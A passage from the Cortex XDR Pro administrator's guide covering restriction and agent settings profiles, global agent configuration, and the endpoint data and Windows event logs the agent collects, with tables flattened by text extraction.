Agent Settings Profile), the local cache is accessible only by the Cortex XDR agent and cannot be changed.
Each time a file attempts to run, the Cortex XDR agent performs a lookup in its local cache to determine if
a verdict already exists. If known, the verdict is either the official WildFire verdict or manually set as a hash
exception. Hash exceptions take precedence over any additional verdict analysis.
If the file is unknown in the local cache, the Cortex XDR agent queries Cortex XDR for the verdict. If Cortex
XDR receives a verdict request for a file that was already analyzed, Cortex XDR immediately responds to
the Cortex XDR agent with the verdict.
If Cortex XDR does not have a verdict for the file, it queries WildFire and optionally submits the file for
analysis. While the Cortex XDR agent attempts waits for an official WildFire verdict, it can use File Analysis

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 113

© 2020 Palo Alto Networks, Inc.
 and Protection Flow to evaluate the file. After Cortex XDR receives the verdict it responds to the Cortex
XDR agent that requested the verdict.
For information on file-examination settings, see Add a New Malware Security Profile.

Add a New Restrictions Security Profile

Restrictions security profiles limit the surface of an attack on a Windows endpoint by defining where and
how your users can run files.
By default, the Cortex XDR agent will receive the default profile that contains a pre-defined configuration
for each restrictions capability. To customize the configuration for specific Cortex XDR agents, configure a
new Restrictions security profile and assign it to one or more policy rules.
To define a Restrictions security profile:

STEP 1 | Add a new profile.

1. From Cortex XDR, select Endpoints > Policy Management > Profiles > + New Profile.
2. Select the platform to which the profile applies and Restrictions as the profile type.
3. Click Next.

STEP 2 | Define the basic settings.

1. Enter a unique Profile Name to identify the profile. The name can contain only letters, numbers, or
spaces, and must be no more than 30 characters. The name you choose will be visible from the list of
profiles when you configure a policy rule.
2. To provide additional context for the purpose or business reason that explains why you are creating
the profile, enter a profile Description. For example, you might include an incident identification
number or a link to a help desk ticket.

STEP 3 | Configure each of the Restrictions Endpoint Protection Capabilities.

1. Configure the action to take when a file attempts to run from a specified location.
• Block—Block the file execution.
• Notify—Allow the file to execute but notify the user that the file is attempting to run from a
suspicious location. The Cortex XDR agent also reports the event to Cortex XDR.
• Report—Allow the file to execute but report it to Cortex XDR.
• Disabled—Disable the module and do not analyze or report execution attempts from restricted
locations.
2. Add files to your allow list or block list, as needed.
The type of protection capability determines whether the capability supports an allow list, block list,
or both. With an allow list, the action mode you configure applies to all the paths except for those
that you specify. With a block list, the action applies only to the paths that you specify.
1. +Adda file or folder.
2. Enter the path and press Enter or click the check mark when done. You can also use a wildcard
to match a partial name for the folder and environment variables. Use ? to match any single
character or * to match any string of characters. To match a folder, you must terminate the path
with * to match all files in the folder (for example, c:\temp\*).
3. Repeat to add additional folders.

STEP 4 | Save the changes to your profile.

STEP 5 | Apply Security Profiles to Endpoints.

114 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
 You can do this in two ways: You can Create a new policy rule using this profile from the right-click
menu or you can launch the new policy wizard from Policy Rules.

Manage Security Profiles

After you customize your Endpoint Security Profiles you can manage them from the Profiles page, as
needed.
• View information about your security profiles
• Edit a security profile
• Duplicate a security profile
• View the security profile rules that use a security profile
• Populate a new policy rule with a security profile
• Delete a security profile

• View information about your security profiles.

The following table displays the fields that are available on the Profiles page in alphabetical order. The
table includes both default fields and additional fields that are available in the column manager.

Field Description

Created By Administrative user who created the security profile.

Created Time Date and time at which the security profile was
created.

Description Optional description entered by an administrator to

describe the security profile.

Modification Time Date and time at which the security profile was
modified.

Modified By Administrative user who modified the security

profile.

Name Name provided to identify the security profile.

Platform Platform type of the security profile.

Summary Summary of security profile configuration.

Type Security profile type.

Usage Count Number of policy rules that use the

• Edit a security profile.

1. From Endpoints > Policy Management > Profiles, right-click the security profile and select Edit.
2. Make your changes and then Save the security profile.

• Duplicate a security profile.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 115

© 2020 Palo Alto Networks, Inc.
 1. From Endpoints > Policy Management > Profiles, right-click the security profile and select Save as
New.
2. Make your changes and then Create the security profile.
3. Populate a new policy rule with a security profile.

• View the security policy rules that use a security profile.

From Endpoints > Policy Management > Profiles, right-click the security profile and select View security
policies.
Cortex XDR displays the policy rules that use the profile.

• Populate a new policy rule with a security profile.

1. From Endpoints > Policy Management > Profiles, right-click the security profile and Create a new
policy rule using this profile.
Cortex XDR automatically populates the Platform selection based on your security profile
configuration and assigns the security profile based on the security profile type.
2. Enter a descriptive Policy Name and optional description for the policy rule.
3. Assign any additional security profiles that you want to apply to your policy rule, and select Next.
4. Select the target endpoints for the policy rule or use the filters to define criteria for the policy rule to
apply, and then select Next.
5. Review the policy rule summary, and if everything looks good, select Done.

• Delete a security profile.

1. If necessary, delete or detach any policy rules that use the profile before attempting to delete it.
2. From Endpoints > Policy Management > Profiles, identify the security profile that you want to
remove.
The Usage Count should have a 0 value.
3. Right-click the security profile and select Delete.
4. Confirm the deletion and you are done.

116 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
Customizable Agent Settings
Each Agent Settings Profile provides a tailored list of settings that you can configure for the platform you
select.
In addition to the customizable Agent Settings Profiles, you can also set:
• Configure Global Agent Settings that apply to all the endpoints in your network.
• Hardened Endpoint Security protections that leverage existing mechanisms and added capabilities to
reduce the attack surface on your endpoints.
The following table describes these customizable settings and indicates which platforms support the setting
(a dash (—) indicates the setting is not supported).

Setting Windows Mac Linux Android

Agent Profiles

Disk Space —
Customize the amount of
disk space the Cortex XDR
agent uses to store logs and
information about events.

User Interface — —
Determine whether and
how end users can access
the Cortex XDR console.

Traps Tampering — — —
Protection
Prevent users from
tampering with the Cortex
XDR agent components by
restricting access.

Uninstall Password — —
Change the default uninstall
password to prevent
unauthorized users from
uninstalling the Cortex XDR
agent software.

Windows Security Center — — —

Configuration
Configure your Windows
Security Center preferences
to allow registration with
the Microsoft Security
Center, to allow registration
with automated Windows

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 117

© 2020 Palo Alto Networks, Inc.
 Setting Windows Mac Linux Android
patch installation, or to
disable registration.

Forensics — — —
Change forensic data
collection and upload
preferences.

XDR Pro Endpoints —

Enable the Cortex XDR Pro
agent capabilities, including
enhanced data collection,
advanced responses, and
available Pro add-ons.
Requires a Cortex XDR Pro
per Endpoint license and
allocation of log storage in
Cortex Data lake.

Response Actions —
Manual response actions
that you can take on the
endpoint after a malicious
file, process, or behavior is
detected. For example, you
can terminate a malicious
process, isolate the infected
endpoint from the network,
quarantine a malicious file,
or perform additional action
as necessary to remediate
the endpoint.

Content Updates — — —
Configure how the Cortex
XDR agent performs
content updates on the
endpoint: whether to
download the content
directly from Cortex XDR
or from a peer agent,
whether to perform
immediate or delayed
updates, and whether to
perform automatic content
updates or continue using
the current content version.

Agent Auto Upgrade —

118 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
Setting Windows Mac Linux Android
Enable the agent to
perform automatic
upgrades whenever a new
agent version is released.
You can choose to upgrade
only to minor versions in
the same line, only to major
versions, or both.

Upload Using Cellular Data — — —

Enable Android endpoints
to send unknown APK files
for inspection as soon as a
user connects to a cellular
network.

Global Agent Configurations

Global Uninstall Password —

Set the uninstall password
for all agents in the system.

Content Bandwidth —
Management
Configure the total
bandwidth to allocate for
content update distribution
within your organization.

Agent Auto Upgrade —

Configure the Cortex
XDR agent auto upgrade
scheduler and number of
parallel upgrades.

Cortex XDR Endpoint Data —

Collection
Configure the type of
information collected by
the Cortex XDR Agent for
Vulnerability Assessment
and Host insights.
See Hardened Endpoint
Security for the list of all
operating systems that
support these capabilities.

Advanced Analysis —
Enable Cortex XDR to
automatically upload alert

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 119

© 2020 Palo Alto Networks, Inc.
 Setting Windows Mac Linux Android
data for secondary verdict
verification and security
policy tuning.

Add a New Agent Settings Profile

Agent Settings Profiles enable you to customize Cortex XDR agent settings for different platforms and
groups of users.

STEP 1 | Add a new profile.

1. From Cortex XDR, select Endpoints > Policy Management > Profiles > + New Profile.
2. Select the platform to which the profile applies and Agent Settings as the profile type.
3. Click Next.

STEP 2 | Define the basic settings.

1. Enter a unique Profile Name to identify the profile. The name can contain only letters, numbers, or
spaces, and must be no more than 30 characters. The name you choose will be visible from the list of
profiles when you configure a policy rule.
2. To provide additional context for the purpose or business reason that explains why you are creating
the profile, enter a profile Description. For example, you might include an incident identification
number or a link to a help desk ticket.

STEP 3 | (Windows, Mac, and Linux only) Configure the Disk Space to allot for Cortex XDR agent logs.
Specify a value in MB from 100 to 10,000 (default is 5,000).

STEP 4 | (Windows and Mac only) Configure User Interface options for the Cortex XDR console.
By default, Cortex XDR uses the settings specified in the default agent settings profile and displays the
default configuration in parenthesis. When you select a setting other than the default, you override the
default configuration for the profile.
• Tray Icon—Choose whether you want the Cortex XDR agent icon to be Visible (default) or Hidden in
the notification area (system tray).
• XDR Agent Console Access—Enable this option to allow access to the Cortex XDR console.
• XDR Agent User Notifications—Enable this option to operate display notifications in the notifications
area on the endpoint. When disabled, the Cortex XDR agent operates in silent mode where
the Cortex XDR agent does not display any notifications in the notification area. If you enable
notifications, you can use the default notification messages, or provide custom text (up to 50
characters) for each notification type. You can also customize a notification footer.
• Live Terminal User Notifications—Choose whether to Notify the end user and display a pop-up on
the endpoint when you initiate a Live Terminal session. For Cortex XDR agents 7.3 and later releases
only, you can choose to Request end-user permission to start the session. If the end user denies the
request, you will not be able to initiate a Live Terminal session on the endpoint.
• (Cortex XDR agent 7.3 and later releases only) Live Terminal Active Session Indication—Enable this

option to display a blinking light ( ) on the tray icon (or in the status bar for Mac endpoints) for the
duration of the remote session to indicate to the end user that a live terminal session is in progress.

STEP 5 | (Android only) Configure network usage preferences.

120 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
 When the option to Upload Using Cellular Data is enabled, the Cortex XDR agent uses cellular data
to send unknown apps to the Cortex XDR for inspection. Standard data charges may apply. When
this option is disabled, the Cortex XDR agent queues any unknown files and sends them when the
endpoint connects to a Wi-Fi network. If configured, the data usage setting on the Android endpoint
takes precedence over this configuration.

STEP 6 | (Windows only) Configure Agent Security options that prevent unauthorized access or
tampering with the Cortex XDR agent components.
Use the default agent settings or customize them for the profile. To customize agent security
capabilities:
1. Enable XDR Agent Tampering Protection.
2. By default, the Cortex XDR agent protects all agent components, however you can configure
protection more granularly for Cortex XDR agent services, processes, files, and registry values. With
Traps 5.0.6 and later releases, when protection is enabled, access will be read-only. In earlier Traps
releases, enabling protection disables all access to services, processes, files, and registry values.

STEP 7 | (Windows and Mac only) Set an Uninstall Password.

Define and confirm a password the user must enter to uninstall the Cortex XDR agent. The uninstall
password is encrypted using encryption algorithm (PBKDF2) when transferred between Cortex XDR and
Cortex XDR agents. Additionally, the uninstall password is used to protect tampering attempts when
using Cytool commands.
The default uninstall password is Password1. A new password must satisfy the following requirements:
• Contain eight or more characters.
• Contain English letters, numbers, or any of the following symbols: !()-._`~@#"'.

STEP 8 | (Windows only) Configure Windows Security Center Integration.

The Windows Security Center is a reporting tool that monitors the system health and security state of
Windows endpoints on Windows 7 and later releases. When Enabled, the Cortex XDR agent registers
with the Windows Security Center as an official Antivirus (AV) software product. When registration is
Disabled, the Cortex XDR agent does not register to the Windows Action Center. As a result, Windows
Action Center could indicate that Virus protection is Off, depending on other security products that are
installed on the endpoint.
For the Cortex XDR agent 5.0 release only, if you want to register the agent to the Windows Security
Center but prevent from Windows to automatically install Meltdown/Spectra vulnerability patches on
the endpoint, change the setting to Enabled (No Patches).

When you Enable the Cortex XDR agent to register to the Windows Security Center,
Windows shuts down Microsoft Defender on the endpoint automatically. If you still want
to allow Microsoft Defender to run on the endpoint where Cortex XDR is installed, you
must Disable this option. However, Palo Alto Networks does not recommend running
Windows Defender and the Cortex XDR agent on the same endpoint since it might cause
performance issues and incompatibility issues with Global Protect and other applications.

STEP 9 | (Windows only) Configure Forensics alert data collection options.

When the Cortex XDR agent alerts on process-related activity on the endpoint, the Cortex XDR agent
collects the contents of memory and other data about the event in what is known as a alert data dump
file. You can customize the Alert Data Dump File Size—Small, Medium, or Full (the largest and most
complete set of information)—and whether to Automatically Upload Alert Data Dump File to Cortex
XDR. During event investigation, if automatic uploading of the alert data dump file was disabled, you can
manually retrieve the data.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 121

© 2020 Palo Alto Networks, Inc.
STEP 10 | (Requires a Cortex XDR Pro per Endpoint license and allocation of log storage in Cortex Data lake)
Enable and configure Cortex XDR Pro Endpoint capabilities on the endpoint, including
enhanced data collection, advanced responses, and available Pro add-ons.
1. Enable XDR Pro Endpoints Capabilities to configure which Pro capabilities to activate on the
endpoint.

The Pro features are hidden until you enable the capability. Enabling this capability consumes a
Cortex XDR Pro per Endpoint license.
2. (Supported on Cortex XDR agent 6.0 or a later for Windows endpoints and Cortex XDR agent 6.1 or
later for Mac and Linux endpoints) Enable Monitor and Collect Enhanced Endpoint Data.
By default, the Cortex XDR agent collects information about events that occur on the endpoint. If
you enable Behavioral Threat Protection in a Malware Security profile, the Cortex XDR agent also
collects information about all active file, process, network, and registry activity on an endpoint (see
Endpoint Data Collected by Cortex XDR). When you enable the Cortex XDR agent to monitor and
collect enhanced endpoint data, you enable Cortex XDR to share the detailed endpoint information
with other Cortex apps. The information can help to provide the endpoint context when a security
event occurs so that you can gain insight on the overall event scope during investigation. The event
scope includes all activities that took place during an attack, the endpoints that were involved, and
the damage caused. When disabled, the Cortex XDR agent will not share endpoint activity logs.
3. (Requires Host Insights add-on and Cortex XDR agent 7.1 or later releases) Enable Host Insights
Capabilities.
• Enable Endpoint Information Collection to allow the Cortex XDR agent to collect Host Inventory
information such as users, groups, services, drivers, hardware, and network shares, as well as
information about applications installed on the endpoint, including CVE and installed KBs for
Vulnerability Assessment.
• (Supported on Cortex XDR agent 7.2 or a later for Windows endpoints and Cortex XDR agent
7.3 or later for Mac endpoints) Enable File Search and Destroy Action Mode to allow the Cortex
XDR agent to collect detailed information about files on the endpoint to create a files inventory
database. The agent locally monitors any actions performed on these files and updates the local
files database in real-time.
With this option you can also choose the File Search and Destroy Monitored File Types where
Cortex XDR monitors all file types or only common file types. If you choose Common file types,
Cortex XDR monitors the following file types:
• Windows—bat, bmp, c, cab, cmd, cpp, csv, db, dbf, doc, docb, docm,
docx, dotm, dotx, dwg, dxf, exif, gif, gz, jar, java, jpeg, jpg, js,
keynote, mdb, mdf, myd, pages, pdf, png, pot, potm, ppam, pps, ppsm,
ppsx, ppt, pptm, pptx, ps1, pub, py, rar, rtf, sdf, sldm, sldx, sql,
sqlite, sqlite3, svg, tar, txt, url, vb, vbe, vbs, vbscript, vsd,
vsdx, wsf, xla, xlb, xlm, xls, xlsm, xlsx, xlt, xltm, xltx, xps, zip,
and 7z.
• Mac—acm, apk, ax, bat, bin, bundle, csv, dll, dmg, doc, docm, docx,
dylib, efi, exe, hta, jar, js, jse, jsf, lua, mpp, mppx, msi, mui,

122 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
 o, ocx, pdf, pkg, pl, plx, pps, ppsm, ppsx, ppt, pptm, pptx, py, pyc,
pyo, rb, rtf, scr, sh, vds, vsd, wsf, xls, xlsm, xlsx, xsdx, and zip.
Additionally, you can exclude files that exist under a specific local path on the endpoint from
inclusion in the files database.

STEP 11 | (Windows and Mac only) Response Actions.

If you need to isolate an endpoint but want to allow access for a specific application , add the process to
the Network Isolation Allow List. The following are considerations to the allow list:
• When you add a specific application to your allow list from network isolation, the Cortex XDR agent
continues to block some internal system processes. This is because some applications, for example
ping.exe, can use other processes to facilitate network communication. As a result, if the Cortex XDR
agent continues to block an application you included in your allow list, you may need to perform
additional network monitoring to determine the process that facilitates the communication, and then
add that process to the allow list.
• (Windows) For VDI sessions, using the network isolation response action can disrupt communication
with the VDI host management system thereby halting access to the VDI session. As a result, before
using the response action you must add the VDI processes and corresponding IP addresses to your
allow list.
1. +Add an entry to the allow list.
2. Specify the Process Path you want to allow and the IPv4 or IPv6 address of the endpoint. Use the
* wildcard on either side to match any process or IP address. For example, specify * as the process
path and an IP address to allow any process to run on the isolated endpoint with that IP address.
Conversely, specify * as the IP address and a specific process path to allow the process to run on any
isolated endpoint that receives this profile.
3. Click the check mark when finished.

STEP 12 | (Supported on Cortex XDR agent 7.0 or a later for Windows endpoints and Cortex XDR agent 7.3
or later for Mac and Linux endpoints) Specify the Content Configuration for your Cortex XDR
agents.
You have several option to configure how your Cortex XDR agent retrieves new content.
• Download Source—Cortex XDR deploys serverless peer-to-peer P2P content distribution to
Cortex XDR agents in your LAN network by default to reduce bandwidth loads. Within the six hour
randomization window during which the Cortex XDR agent attempts to retrieve the new content
version, it will broadcast its peer agents on the same subnet twice: once within the first hour, and
once again during the following five hours. If the agent did not retrieve the new content from other
agents in both queries, it will retrieve it from Cortex XDR directly. If you do not want to allow P2P
content distribution, select the Cortex Server download source to allow all Cortex XDR agents
in your network to retrieve the content directly from the Cortex XDR server on their following
heartbeat.
To enable P2P, you must enable UDP and TCP over the defined PORT in Content Download Source.
By default, Cortex XDR uses port 33221. You can configure another port number.

Limitations in the content download process:

• When you install the Cortex XDR agent, the agent retrieves the latest content
update version available. A freshly installed agent can take between five to ten
minutes (depending on your network and content update settings) to retrieve the
content for the first time. During this time, your endpoint is not protected.
• When you upgrade a Cortex XDR agent to a newer Cortex XDR agent version, if
the new agent cannot use the content version running on the endpoint, then the

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 123

© 2020 Palo Alto Networks, Inc.
 new content update will start within one minute in P2P and within five minutes from
Cortex XDR.
• Content Auto-update—By default, the Cortex XDR agent always retrieves the most updated content
and deploys it on the endpoint so it is always protected with the latest security measures. However,
you can Disable the automatic content download. Then, the agent stops retrieving content updates
from the Cortex XDR Server and keeps working with the current content on the endpoint.

•
If you disable content updates for a newly installed agent, the agent will retrieve the
content for the first time from Cortex XDR and then disable content updates on the
endpoint.
• When you add a Cortex XDR agent to an endpoints group with disabled content
auto-upgrades policy, then the policy is applied to the added agent as well.
• Content Rollout—The Cortex XDR agent can retrieve content updates Immediately as they are
available, or after a pre-configured Delayed period. When you delay content updates, the Cortex
XDR agent will retrieve the content according to the configured delay. For example, if you configure
a delay period of two days, the agent will not use any content released in the last 48 hours.

If you disable or delay automatic-content updates provided by Palo Alto Networks, it may
affect the security level in your organization.

STEP 13 | Enable Agent Auto Upgrade for your Cortex XDR agents.
To ensure your endpoints are always up-to-date with the latest Cortex XDR agent release, enable
automatic agent upgrades. For increased flexibility, you can choose to apply automatic upgrades to
major releases only, to minor releases only, or to both. It can take up to 15 minutes for new and updated
auto-upgrade profile settings to take effect on your endpoints.

Automatic agent upgrades are not supported with non-persistent VDI and temporary
sessions.

To control the agent auto upgrade scheduler and number of parallel upgrades in your network, see
Configure Global Agent Settings.

Automatic upgrades are not supported with non-persistent VDI and temporary sessions.

STEP 14 | Enable Network Location Configuration for your Cortex XDR agents.
(Requires Cortex XDR agents 7.1 and later releases) If you configure host firewall rules in your network,
you must enable Cortex XDR to determine the network location of your device, as follows:
1. A domain controller (DC) connectivity test— When Enabled, the DC test checks whether the device
is connected to the internal network or not. If the device is connected to the internal network, then
it is in the organization. Otherwise, if the DC test failed or returned an external domain, Cortex XDR
proceeds to a DNS connectivity test.
2. A DNS test—In the DNS test, the Cortex XDR agent submits a DNS name that is known only to the
internal network. If the DNS returned the pre-configured internal IP, then the device is within the
organization. Otherwise, if the DNS IP cannot be resolved, then the device is located elsewhere.
Enter the IP Address and DNS Server Name for the test.
If the Cortex XDR agent detects a network change on the endpoint, the agent triggers the device
location test, and re-calculates the policy according to the new location.

STEP 15 | Save the changes to your profile.

STEP 16 | Apply Security Profiles to Endpoints.

124 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
 You can do this in two ways: You can Create a new policy rule using this profile from the right-click
menu or you can launch the new policy wizard from Policy Rules.

Configure Global Agent Settings

On top of customizable Agent Settings Profiles for each Operating System and different endpoint targets,
you can set global Agent Configurations that apply to all the endpoints in your network.

STEP 1 |
From Cortex XDR, select > Settings > Agent Configuration.

STEP 2 | Set global uninstall password.

The uninstall password is required to remove a Cortex XDR agent and to grant access to agent security
component on the endpoint. You can use the default uninstall Password1 defined in Cortex XDR or set
a new one and Save. This global uninstall password applies to all the endpoints (excluding mobile) in your
network. If you change the password later on, the new default password applies to all new and existing
profiles to which it applied before. If you want to use a different password to uninstall specific agents,
you can override the default global uninstall password by setting a different password for those agents
in the Agent Settings profile.

STEP 3 | Configure content bandwidth allocated for all endpoints.

To control the amount of bandwidth allocated in your network to Cortex XDR content updates, assign
a Content bandwidth management value between 20-10,000 Mbps. To help you with this calculation,
Cortex XDR recommends the optimal value of Mbps based on the number of active agents in your
network, and including overhead considerations for large content updates. Cortex XDR will verify that
agents attempting to download the content update are within the allocated bandwidth before beginning
the distribution. If the bandwidth has reached its cap, the download will be refused and the agents will
attempt again at a later time. After you set the bandwidth, Save the configuration.

STEP 4 | Configure the Cortex XDR agent auto upgrade scheduler and number of parallel upgrades.
If Agent Auto Upgrades are enabled for your Cortex XDR agents, you can control the automatic upgrade
process in your network:
• Amount of agents per batch—Set the number of parallel agent upgrades, while the minimum is 500
agents.
• Days in week—You can schedule the upgrade task for specific days of the week and a specific time
range. The minimum range is four hours.

STEP 5 | Configure automated Advanced Analysis of XDR Agent alerts raised by exploit protection
modules.
Advanced Analysis is an additional verification method you can use to validate the verdict issued by
the Cortex XDR agent. In addition, Advanced Analysis also helps Palo Alto Networks researchers tune
exploit protection modules for accuracy.
To initiate additional analysis you must retrieve data about the alert from the endpoint. You can do this
manually on an alert-by-alert basis or you can enable Cortex XDR to automatically retrieve the files.
After Cortex XDR receives the data, it automatically analyzes the memory contents and renders a
verdict. When the analysis is complete, Cortex XDR displays the results in the Advanced Analysis field
of the Additional data view for the data retrieval action on the Action Center. If the Advanced Analysis
verdict is benign, you can avoid subsequent blocked files for users that encounter the same behavior by
enabling Cortex XDR to automatically create and distribute exceptions based on the Advanced Analysis
results.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 125

© 2020 Palo Alto Networks, Inc.
 1. Configure the desired options:
• Enable Cortex XDR to automatically upload defined alert data files for advanced analysis.
Advanced Analysis increases the Cortex XDR exploit protection module accuracy
• Automatically apply Advanced Analysis exceptions to your Global Exceptions list. This will apply
all Advanced Analysis exceptions suggested by Cortex XDR, regardless of the alert data file
source
2. Save the Advanced Analysis configuration.

STEP 6 | Configure the Cortex XDR Agent license revocation and deletion period.
This configuration applies to standard endpoints only and does not impact the license status of agents
for VDIs or Temporary Sessions.

1. Configure the desired options:

• Connection Lost (Days)—Configure the number of days after which the license should be returned
when an agent loses the connection to Cortex XDR. Default is 30 days; Range is 2 to 60 days.
• Agent Deletion (Days)—Configure the number of days after which the agent and related data is
removed from the Cortex XDR management console and database. Default is 180 days; Range is 3
to 360 days and must exceed the Connection Lost value.
2. Save the Agent Status configuration.

Endpoint Data Collected by Cortex XDR

When the Cortex XDR agent alerts on endpoint activity, the agent collects a minimum set of data about the
endpoint as described in Data Collected for All Alerts.
When you enable behavioral threat protection or EDR data collection in your endpoint security policy, the
Cortex XDR agent can also continuously monitor endpoint activity for malicious event chains identified
by Palo Alto Networks. The endpoint data that the Cortex XDR agent collects when you enable these
capabilities varies by the platform type:
• Additional Endpoint Data Collected for Windows Endpoints
• Windows Event Logs
• Additional Endpoint Data Collected for Mac Endpoints
• Additional Endpoint Data Collected for Linux Endpoints

Data Collected for All Alerts

When Cortex XDR raises an alert on an endpoint, the Cortex XDR agent collects the following data and
sends it to Cortex XDR.

Field Description

Absolute Timestamp Kernel system time

126 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
 Field Description

Relative Timestamp Uptime since the computer booted

Thread ID ID of the originating thread

Process ID ID of the originating process

Process Creation Time Part of process unique ID per boot session (PID + creation time)

Sequence ID Unique integer per boot session

Primary User SID Unique identifier of the user

Impersonating User SID Unique identifier of the impersonating user, if applicable

Additional Endpoint Data Collected for Windows Endpoints

Category Events Attributes

Executable metadata (Traps 6.1 Process start • File size

and later) • File access time

Files • Create • Full path of the modified file

• Write before and after modification
• Delete • SHA256 and MD5 hash for
• Rename the file after modification
• Move • SetInformationFile for
• Modification (Traps 6.1 and timestamps (Traps 6.1 and
later) later)
• Symbolic links (Traps 6.1 and • File set security (DACL)
later) information (Traps 6.1 and
later)
• Resolve hostnames on local
network (Traps 6.1 and later)
• Symbolic-link/hard-link and
reparse point creation (Traps
6.1 and later)

Image (DLL) Load • Full path

• Base address
• Target process-id/thread-id
• Image size
• Signature (Traps 6.1 and later)
• SHA256 and MD5 hash for
the DLL (Traps 6.1 and later)
• File size (Traps 6.1 and later)
• File access time (Traps 6.1 and
later)

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 127

© 2020 Palo Alto Networks, Inc.
 Category Events Attributes

Process • Create • Process ID (PID) of the parent

• Terminate process
• PID of the process
• Full path
• Command line arguments
• Integrity level to determine
if the process is running with
elevated privileges
• Hash (SHA256 and MD5)
• Signature or signing certificate
details

Thread Injection • Thread ID of the parent

thread
• Thread ID of the new or
terminating thread
• Process that initiated the
thread if from another process

Network • Accept • Source IP address and port

• Connect • Destination IP address and
• Create port
• Listen • Failed connection
• Close • Protocol (TCP/UDP)
• Bind • Resolve hostnames on local
network

Network Protocols • DNS request and UDP • Origin country

response • Remote IP address and port
• HTTP connect • Local IP address and port
• HTTP disconnect • Destination IP address and
• HTTP proxy parsing port if proxy connection
• Network connection ID
• IPv6 connection status (true/
false)

Network Statistics • On-close statistics • Upload volume on TCP link

• Periodic statistics • Download volume on TCP link
Traps sends statistics on
connection close and periodically
while connection is open

Registry • Registry value: • Registry path of the modified

value or key
• Deletion
• Name of the modified value or
• Set
key
• Registry key:
• Data of the modified value
• Creation
• Deletion

128 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
Category Events Attributes
• Rename
• Addition
• Modification (set
information)
• Restore
• Save

Session • Log on • Interactive log-on to the

• Log off computer
• Connect • Session ID
• Disconnect • Session State (equivalent to
the event type)
• Local (physically on the
computer) or remote
(connected using a terminal
services session)

Host Status • Boot • Host name

• Suspend • OS Version
• Resume • Domain
• Previous and current state

User Presence (Traps 6.1 and User Detection Detection when a user is present
later) or idle per active user session on
the computer.

Windows Event Logs See the Windows Event Logs table for the list of Windows Event
Logs that the agent can collect.

In Traps 6.1.3 and later releases, Cortex XDR and Traps agents can collect the following Windows Event
Logs:

Table 1: Windows Event Logs

Path Provider Event IDs Description

Application EMET

Application Windows Error WER events for application

Reporting crashes only

Application Microsoft-Windows- 1511, 1518 User logging on with temporary

User Profiles Service profile (1511), Cannot create
profile using temporary profile
(1518)

Application Application Error 1000 Application crash/hang events,

similar to WER/1001. These
include full path to faulting EXE/
Module

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 129

© 2020 Palo Alto Networks, Inc.
 Path Provider Event IDs Description

Application Application Hang 1002 Application crash/hang events,

similar to WER/1001. These
include full path to faulting EXE/
Module

Microsoft-Windows- 11, 70, 90 CAPI events Build Chain (11),

CAPI2/Operational Private Key accessed (70), X509
object (90)

Microsoft-Windows- 3008 DNS Query Completed (3008)

DNS-Client/ without local machine na,e
Operational resolution events and without
enmpty name resolution events

Microsoft-Windows- 2004 Detect User-Mode drivers loaded

DriverFrameworks- - for potential BadUSB detection
UserMode/Operational

Microsoft-Windows- 4103, 4104, PowerShell execute block activity

PowerShell/ 4105, 4106 (4103), Remote Command (4104),
Operational Start Command (4105), Stop
Command (4106)

Microsoft-Windows- Microsoft-Windows- 106, 129,

TaskScheduler/ TaskScheduler 141, 142,
Operational 200, 201

Microsoft-Windows- 1024 Log attempted TS connect to

TerminalServices- remote server
RDPClient/Operational

Microsoft-Windows- 1006, 1009 Modern Windows Defender event

Windows Defender/ provider Detection events (1006
Operational and 1009)

Microsoft-Windows- 1116, 1119 Modern Windows Defender event

Windows Defender/ provider Detection events (1116
Operational and 1119)

Microsoft-Windows- Microsoft-Windows- 2004, 2005, Windows Firewall With Advanced

Windows Firewall With Windows Firewall With 2006, 2009, Security Local Modifications
Advanced Security/ Advanced Security 2033 (Levels 0, 2, 4)
Firewall

Security 4698, 4702

Security 4778, 4779 TS Session reconnect (4778), TS

Session disconnect (4779)

Security 5140 Network share object access

without IPC$ and Netlogon shares

130 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
Path Provider Event IDs Description

Security 5140, 5142, Network Share create (5142),

5144, 5145 Network Share Delete (5144), A
network share object was checked
to see whether client can be
granted desired access (5145),
Network share object access
(5140)

Security 4616 System Time Change (4616)

Security 4624 Local logons without network or

service events

Security 1100, 1102 Security Log cleared events

(1102), EventLog Service
shutdown (1100)

Security 4647 User initiated logoff

Security 4634 User logoff for all non-network

logon sessions

Security 4624 Service logon events if the

user account isn't LocalSystem,
NetworkService, LocalService

Security 5142, 5144 Network Share create (5142),

Network Share Delete (5144)

Security 4688 Process Create (4688)

Security Microsoft-Windows- Event log service events specific

Eventlog to Security channel

Security 4672 Special Privileges (Admin-

equivalent Access) assigned to
new logon, excluding LocalSystem

Security 4732 New user added to local security

group

Security 4728 New user added to global security

group

Security 4756 New user added to universal

security group

Security 4733 User removed from local

Administrators group

Security 4886, 4887, Certificate Services received

4888 certificate request (4886),

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 131

